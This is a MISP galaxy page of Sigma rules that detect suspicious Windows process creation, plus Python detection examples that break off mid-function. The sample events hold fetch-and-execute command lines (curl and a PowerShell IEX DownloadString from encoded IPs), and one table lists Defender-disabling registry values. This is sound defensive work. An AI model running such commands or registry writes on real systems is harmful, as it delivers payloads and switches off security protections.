creation_date 2022/04/27
falsepositive ['Unlikely']
filename proc_creation_win_hktl_execution_via_pe_metadata.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1588.002', 'attack.t1003']
Related clusters

To see the related clusters, click here.

HackTool - Impacket Tools Execution

Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)

Internal MISP references

UUID 4627c6ae-6899-46e2-aa0c-6ebcb1becd19 which can be used as unique global reference for HackTool - Impacket Tools Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/24
falsepositive ['Legitimate use of the impacket tools']
filename proc_creation_win_hktl_impacket_tools.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1557.001']
Related clusters

To see the related clusters, click here.

Rundll32 Spawned Via Explorer.EXE

Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.

Internal MISP references

UUID 1723e720-616d-4ddc-ab02-f7e3685a4713 which can be used as unique global reference for Rundll32 Spawned Via Explorer.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author CD_ROM_
creation_date 2022/05/21
falsepositive ['Unknown']
filename proc_creation_win_rundll32_parent_explorer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Scheduled Task Executing Payload from Registry

Detects the creation of a scheduled task (schtasks) that potentially executes a payload stored in the Windows Registry using PowerShell.

Internal MISP references

UUID 86588b36-c6d3-465f-9cee-8f9093e07798 which can be used as unique global reference for Scheduled Task Executing Payload from Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/18
falsepositive ['Unknown']
filename proc_creation_win_schtasks_reg_loader.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1053.005', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious DLL Registered Via Odbcconf.EXE

Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't have a ".dll" extension, which is often used as a method to evade defenses.

Internal MISP references

UUID ba4cfc11-d0fa-4d94-bf20-7c332c412e76 which can be used as unique global reference for Potentially Suspicious DLL Registered Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/22
falsepositive ['Unlikely']
filename proc_creation_win_odbcconf_register_dll_regsvr_susp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Suspicious Remote Child Process From Outlook

Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).

Internal MISP references

UUID e212d415-0e93-435f-9e1a-f29005bb4723 which can be used as unique global reference for Suspicious Remote Child Process From Outlook in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Nasreddine Bencherchali (Nextron Systems)
creation_date 2018/12/27
falsepositive ['Unknown']
filename proc_creation_win_office_outlook_susp_child_processes_remote.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Uncommon Svchost Parent Process

Detects an uncommon svchost parent process

Internal MISP references

UUID 01d2e2a1-5f09-44f7-9fc1-24faa7479b6d which can be used as unique global reference for Uncommon Svchost Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/08/15
falsepositive ['Unknown']
filename proc_creation_win_svchost_uncommon_parent_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.005']
Related clusters

To see the related clusters, click here.

Suspicious WebDav Client Execution Via Rundll32.EXE

Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397

Internal MISP references

UUID 982e9f2d-1a85-4d5b-aea4-31f5e97c6555 which can be used as unique global reference for Suspicious WebDav Client Execution Via Rundll32.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2023/03/16
falsepositive ['Unknown']
filename proc_creation_win_rundll32_webdav_client_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048.003', 'cve.2023.23397']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Child Process Of VsCode

Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.

Internal MISP references

UUID 5a3164f2-b373-4152-93cf-090b13c12d27 which can be used as unique global reference for Potentially Suspicious Child Process Of VsCode in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/26
falsepositive ['In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly']
filename proc_creation_win_vscode_child_processes_anomalies.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

User Added to Local Administrators Group

Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".

Internal MISP references

UUID ad720b90-25ad-43ff-9b5e-5c841facc8e5 which can be used as unique global reference for User Added to Local Administrators Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/12
falsepositive ['Administrative activity']
filename proc_creation_win_susp_add_user_local_admin_group.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Script Event Consumer Spawning Process

Detects a suspicious child process of Script Event Consumer (scrcons.exe).

Internal MISP references

UUID f6d1dd2f-b8ce-40ca-bc23-062efb686b34 which can be used as unique global reference for Script Event Consumer Spawning Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S
creation_date 2021/06/21
falsepositive ['Unknown']
filename proc_creation_win_scrcons_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

HackTool - Hashcat Password Cracker Execution

Detects execution of Hashcat.exe with a provided SAM file from the Windows registry and a password list to crack against.

Internal MISP references

UUID 39b31e81-5f5f-4898-9c0e-2160cfc0f9bf which can be used as unique global reference for HackTool - Hashcat Password Cracker Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/27
falsepositive ['Tools that use similar command line flags and values']
filename proc_creation_win_hktl_hashcat.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1110.002']
Related clusters

To see the related clusters, click here.

Bypass UAC via CMSTP

Detects command-line usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files.

Internal MISP references

UUID e66779cc-383e-4224-a3a4-267eeb585c40 which can be used as unique global reference for Bypass UAC via CMSTP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate use of cmstp.exe utility by legitimate user']
filename proc_creation_win_uac_bypass_cmstp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1548.002', 'attack.t1218.003']
Related clusters

To see the related clusters, click here.

Capture Credentials with Rpcping.exe

Detects the use of Rpcping.exe to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.

Internal MISP references

UUID 93671f99-04eb-4ab4-a161-70d446a84003 which can be used as unique global reference for Capture Credentials with Rpcping.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020/10/09
falsepositive ['Unlikely']
filename proc_creation_win_rpcping_credential_capture.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

New Process Created Via Taskmgr.EXE

Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC

Internal MISP references

UUID 3d7679bd-0c00-440c-97b0-3f204273e6c7 which can be used as unique global reference for New Process Created Via Taskmgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/03/13
falsepositive ['Administrative activity']
filename proc_creation_win_taskmgr_susp_child_process.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

PUA - Advanced Port Scanner Execution

Detects the use of Advanced Port Scanner.

Internal MISP references

UUID 54773c5f-f1cc-4703-9126-2f797d96a69d which can be used as unique global reference for PUA - Advanced Port Scanner Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/18
falsepositive ['Legitimate administrative use', 'Tools with similar commandline (very rare)']
filename proc_creation_win_pua_advanced_port_scanner.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1046', 'attack.t1135']
Related clusters

To see the related clusters, click here.

File Download From IP URL Via Curl.EXE

Detects file downloads directly from IP address URL using curl.exe

Internal MISP references

UUID 9cc85849-3b02-4cb5-b371-3a1ff54f2218 which can be used as unique global reference for File Download From IP URL Via Curl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/18
falsepositive ['Unknown']
filename proc_creation_win_curl_download_direct_ip_exec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Disable Windows Defender AV Security Monitoring

Detects attackers attempting to disable Windows Defender using PowerShell.

Internal MISP references

UUID a7ee1722-c3c5-aeff-3212-c777e4733217 which can be used as unique global reference for Disable Windows Defender AV Security Monitoring in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author ok @securonix invrep-de, oscd.community, frack113
creation_date 2020/10/12
falsepositive ['Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice.']
filename proc_creation_win_powershell_disable_defender_av_security_monitoring.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

PUA - DefenderCheck Execution

Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.

Internal MISP references

UUID f0ca6c24-3225-47d5-b1f5-352bf07ecfa7 which can be used as unique global reference for PUA - DefenderCheck Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/30
falsepositive ['Unlikely']
filename proc_creation_win_pua_defendercheck.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.005']
Related clusters

To see the related clusters, click here.

HackTool - SharpView Execution

Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems

Internal MISP references

UUID b2317cfa-4a47-4ead-b3ff-297438c0bc2d which can be used as unique global reference for HackTool - SharpView Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/10
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpview.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1049', 'attack.t1069.002', 'attack.t1482', 'attack.t1135', 'attack.t1033']
Related clusters

To see the related clusters, click here.

UAC Bypass WSReset

Detects the pattern of UAC bypass via WSReset, detectable with the default sysmon-config.

Internal MISP references

UUID 89a9a0e0-f61a-42e5-8957-b1479565a658 which can be used as unique global reference for UAC Bypass WSReset in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_wsreset_integrity_level.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

DeviceCredentialDeployment Execution

Detects the execution of DeviceCredentialDeployment to hide a process from view

Internal MISP references

UUID b8b1b304-a60f-4999-9a6e-c547bde03ffd which can be used as unique global reference for DeviceCredentialDeployment Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Unlikely']
filename proc_creation_win_lolbin_device_credential_deployment.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

WMIC Remote Command Execution

Detects the execution of WMIC to query information on a remote system

Internal MISP references

UUID 7773b877-5abb-4a3e-b9c9-fd0369b59b00 which can be used as unique global reference for WMIC Remote Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/14
falsepositive ['Unknown']
filename proc_creation_win_wmic_remote_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

PowerShell Base64 Encoded WMI Classes

Detects calls to base64 encoded WMI class such as "Win32_Shadowcopy", "Win32_ScheduledJob", etc.

Internal MISP references

UUID 1816994b-42e1-4fb1-afd2-134d88184f71 which can be used as unique global reference for PowerShell Base64 Encoded WMI Classes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/30
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_wmi_classes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Microsoft Workflow Compiler Execution

Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.

Internal MISP references

UUID 419dbf2b-8a9b-4bea-bf99-7544b050ec8d which can be used as unique global reference for Microsoft Workflow Compiler Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nik Seetharaman, frack113
creation_date 2019/01/16
falsepositive ['Legitimate MWC use (unlikely in modern enterprise environments)']
filename proc_creation_win_lolbin_workflow_compiler.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1127', 'attack.t1218']
Related clusters

To see the related clusters, click here.

PUA - Netcat Suspicious Execution

Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network

Internal MISP references

UUID e31033fc-33f0-4020-9a16-faf9b31cbf08 which can be used as unique global reference for PUA - Netcat Suspicious Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2021/07/21
falsepositive ['Legitimate ncat use']
filename proc_creation_win_pua_netcat.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1095']
Related clusters

To see the related clusters, click here.

Suspicious Download Via Certutil.EXE

Detects the execution of certutil with certain flags that allow the utility to download files.

Internal MISP references

UUID 19b08b1c-861d-4e75-a1ef-ea0c1baf202b which can be used as unique global reference for Suspicious Download Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/15
falsepositive ['Unknown']
filename proc_creation_win_certutil_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Suspicious Execution of Systeminfo

Detects usage of the "systeminfo" command to retrieve information

Internal MISP references

UUID 0ef56343-059e-4cb6-adc1-4c3c967c5e46 which can be used as unique global reference for Suspicious Execution of Systeminfo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename proc_creation_win_systeminfo_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Domain Trust Discovery Via Dsquery

Detects execution of "dsquery.exe" for domain trust discovery

Internal MISP references

UUID 3bad990e-4848-4a78-9530-b427d854aac0 which can be used as unique global reference for Domain Trust Discovery Via Dsquery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus, Tony Lambert, oscd.community, omkar72
creation_date 2019/10/24
falsepositive ['Legitimate use of the utilities by legitimate user for legitimate reason']
filename proc_creation_win_dsquery_domain_trust_discovery.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1482']
Related clusters

To see the related clusters, click here.

Suspicious Scan Loop Network

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system

Internal MISP references

UUID f8ad2e2c-40b6-4117-84d7-20b89896ab23 which can be used as unique global reference for Suspicious Scan Loop Network in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/12
falsepositive ['Legitimate script']
filename proc_creation_win_susp_network_scan_loop.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.discovery', 'attack.t1018']
Related clusters

To see the related clusters, click here.

Logged-On User Password Change Via Ksetup.EXE

Detects a password change for the logged-on user via "ksetup.exe".

Internal MISP references

UUID c9783e20-4793-4164-ba96-d9ee483992c4 which can be used as unique global reference for Logged-On User Password Change Via Ksetup.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/06
falsepositive ['Unknown']
filename proc_creation_win_ksetup_password_change_user.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious JavaScript Execution Via Mshta.EXE

Detects execution of javascript code using "mshta.exe".

Internal MISP references

UUID 67f113fa-e23d-4271-befa-30113b3e08b1 which can be used as unique global reference for Suspicious JavaScript Execution Via Mshta.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2019/10/24
falsepositive ['Unknown']
filename proc_creation_win_mshta_javascript.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.005']
Related clusters

To see the related clusters, click here.

Ruby Inline Command Execution

Detects execution of ruby using the "-e" flag. This could be used as a way to launch a reverse shell or execute live ruby code.

Internal MISP references

UUID 20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8 which can be used as unique global reference for Ruby Inline Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/02
falsepositive ['Unknown']
filename proc_creation_win_ruby_inline_command_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Potential RDP Tunneling Via Plink

Execution of plink to perform data exfiltration and tunneling

Internal MISP references

UUID f38ce0b9-5e97-4b47-a211-7dc8d8b871da which can be used as unique global reference for Potential RDP Tunneling Via Plink in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/04
falsepositive ['Unknown']
filename proc_creation_win_plink_susp_tunneling.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1572']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Logon Scripts - CommandLine

Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence

Internal MISP references

UUID 21d856f9-9281-4ded-9377-51a1a6e2a432 which can be used as unique global reference for Potential Persistence Via Logon Scripts - CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tom Ueltschi (@c_APT_ure)
creation_date 2019/01/12
falsepositive ['Legitimate addition of Logon Scripts via the command line by administrators or third party tools']
filename proc_creation_win_registry_logon_script.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1037.001']
Related clusters

To see the related clusters, click here.

Delete Important Scheduled Task

Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities

Internal MISP references

UUID dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 which can be used as unique global reference for Delete Important Scheduled Task in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/09
falsepositive ['Unlikely']
filename proc_creation_win_schtasks_delete.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

Obfuscated IP Download Activity

Detects use of an encoded/obfuscated version of an IP address (hex, octal, ...) in a URL combined with a download command

Internal MISP references

UUID cb5a2333-56cf-4562-8fcb-22ba1bca728d which can be used as unique global reference for Obfuscated IP Download Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2022/08/03
falsepositive ['Unknown']
filename proc_creation_win_susp_obfuscated_ip_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery']
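
The encoding side of this detection is easy to get wrong, because Windows download tools resolve IPv4 literals with inet_aton semantics (hex, octal, decimal and shortened forms all work). The following is an added example written for this page, not code from the Sigma project or the rule's authors: it normalizes any inet_aton-style literal back to dotted-decimal and flags a command line only when such a literal appears in a URL together with a download primitive, which is the rule's second condition. The download marker list, the sample events and the 203.0.113.0/24 addresses are constructed for the example.

```python
import re

# Download primitives the rule pairs with an encoded IP literal (illustrative list, an assumption
# for this example rather than the rule's exact selection).
DOWNLOAD_MARKERS = (
    "curl", "wget", "certutil", "bitsadmin", "invoke-webrequest", "iwr ",
    "downloadstring", "downloadfile", "start-bitstransfer", "net.webclient",
)

# Host portion of an http(s) URL: letters, digits and dots, ending at ':', '/', a quote or whitespace.
URL_HOST_RE = re.compile(r"https?://([0-9A-Za-z.]+)", re.IGNORECASE)


def _parse_part(part):
    """Parse one dotted component as inet_aton does: 0x.. is hex, a leading 0 is octal, else decimal."""
    p = part.lower()
    try:
        if p.startswith("0x"):
            return int(p[2:], 16) if len(p) > 2 else None
        if len(p) > 1 and p.startswith("0"):
            return int(p, 8)
        return int(p, 10)
    except ValueError:
        return None


def normalize_ipv4(host):
    """Return the dotted-decimal form of an inet_aton-style IPv4 literal, or None if host is not one.

    One to four components are accepted and, as in inet_aton, the last component fills every
    remaining byte: '127.1', '0x7f000001', '0177.0.0.1' and '2130706433' all become '127.0.0.1'.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_parse_part(p) for p in parts]
    if any(v is None or v < 0 for v in values):
        return None
    *lead, last = values
    if any(v > 0xFF for v in lead):
        return None
    last_bits = 8 * (4 - len(lead))
    if last >= 1 << last_bits:
        return None
    packed = 0
    for v in lead:
        packed = (packed << 8) | v
    packed = (packed << last_bits) | last
    return ".".join(str((packed >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def find_obfuscated_ip_downloads(command_line):
    """Return [(raw_host, dotted_decimal)] for each URL host that is an encoded or shortened IPv4
    literal, but only if the command line also carries a download primitive."""
    lowered = command_line.lower()
    if not any(marker in lowered for marker in DOWNLOAD_MARKERS):
        return []
    hits = []
    for host in URL_HOST_RE.findall(command_line):
        dotted = normalize_ipv4(host)
        # Plain dotted-decimal normalizes to itself; anything else was encoded.
        if dotted is not None and dotted != host:
            hits.append((host, dotted))
    return hits


def scan_events(events):
    """Run the detection over process_creation events; returns (CommandLine, hits) for flagged ones."""
    flagged = []
    for event in events:
        hits = find_obfuscated_ip_downloads(event["CommandLine"])
        if hits:
            flagged.append((event["CommandLine"], hits))
    return flagged


# Constructed sample events (not real telemetry); 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe http://0xCB007105/payload.exe -o C:\Users\Public\p.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://0313.0.0161.05/a.ps1')\""},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe http://203.0.113.5/ok.txt"},
    {"Image": r"C:\Windows\System32\PING.EXE",
     "CommandLine": "ping 0xCB007105"},   # encoded literal but no download primitive
]

if __name__ == "__main__":
    for command_line, hits in scan_events(SAMPLE_EVENTS):
        print("ALERT", hits, "<-", command_line)
```

The parser is written by hand rather than delegated to socket.inet_aton because that call's acceptance of hex, octal and shortened forms depends on the platform's libc, and the detection must behave the same on the analysis host as on the Windows endpoint. Note that shortened forms such as 127.1 are also reported; if that is too noisy, compare the component count instead of the normalized string.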

Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.

Internal MISP references

UUID 48917adc-a28e-4f5d-b729-11e75da8941f which can be used as unique global reference for Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/13
falsepositive ['Legitimate use']
filename proc_creation_win_reg_defender_exclusion.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Interesting Service Enumeration Via Sc.EXE

Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.

Internal MISP references

UUID e83e8899-c9b2-483b-b355-5decc942b959 which can be used as unique global reference for Interesting Service Enumeration Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2024/02/12
falsepositive ['Unknown']
filename proc_creation_win_sc_query_interesting_services.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.t1003']
Related clusters

To see the related clusters, click here.

Suspicious Windows Defender Registry Key Tampering Via Reg.EXE

Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection

Internal MISP references

UUID 452bce90-6fb0-43cc-97a5-affc283139b3 which can be used as unique global reference for Suspicious Windows Defender Registry Key Tampering Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/03/22
falsepositive ['Rare legitimate use by administrators to test software (should always be investigated)']
filename proc_creation_win_reg_windows_defender_tamper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.
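
Both reg.exe rules above (the folder-exclusion rule and this tampering rule) reduce to the same question: which Defender key and value does a "reg add" write to, and with what data? The following added example, written for this page and not code from the Sigma project, parses reg.exe command lines and classifies them as an exclusion (where the excluded path is the value name, not the data) or a protection-disabling write. The key fragments, the tamper value table, the suspect directory list and the sample commands are assumptions made for the illustration and are shorter than the rules' own selections.

```python
import shlex

# Registry key fragments (lower-case, backslash-delimited) that identify Defender configuration.
DEFENDER_KEY_FRAGMENTS = (
    "\\microsoft\\windows defender",
    "\\policies\\microsoft\\windows defender",
)
EXCLUSION_FRAGMENT = "\\windows defender\\exclusions\\"

# Value names whose write disables a protection feature, mapped to the data that disables it.
# Illustrative subset (assumption for this example); the rule's own list is longer.
TAMPER_VALUES = {
    "disableantispyware": "1",
    "disableantivirus": "1",
    "disablerealtimemonitoring": "1",
    "disablebehaviormonitoring": "1",
    "disableioavprotection": "1",
    "disableonaccessprotection": "1",
    "disablescriptscanning": "1",
    "disableblockatfirstseen": "1",
    "tamperprotection": "0",
    "spynetreporting": "0",
    "submitsamplesconsent": "0",
}

# Directories where Qbot-style exclusions land; an exclusion there deserves a higher priority.
SUSPECT_EXCLUSION_DIRS = ("\\appdata\\", "\\programdata\\", "\\users\\public\\", "\\temp\\")


def parse_reg_add(command_line):
    """Return (key, value_name, data) from a 'reg add' command line, or None for any other command."""
    try:
        # posix=False keeps Windows backslashes literal and returns quoted arguments as one token.
        tokens = [t.strip('"') for t in shlex.split(command_line, posix=False)]
    except ValueError:
        return None
    if len(tokens) < 3:
        return None
    exe = tokens[0].lower().rsplit("\\", 1)[-1]
    if exe not in ("reg", "reg.exe") or tokens[1].lower() != "add":
        return None
    key, value_name, data = tokens[2], None, None
    for i, tok in enumerate(tokens[3:], start=3):
        if tok.lower() == "/v" and i + 1 < len(tokens):
            value_name = tokens[i + 1]
        elif tok.lower() == "/d" and i + 1 < len(tokens):
            data = tokens[i + 1]
    return key, value_name, data


def classify_reg_command(command_line):
    """Classify a reg.exe command line as a Defender exclusion, a Defender tamper write, or None."""
    parsed = parse_reg_add(command_line)
    if parsed is None:
        return None
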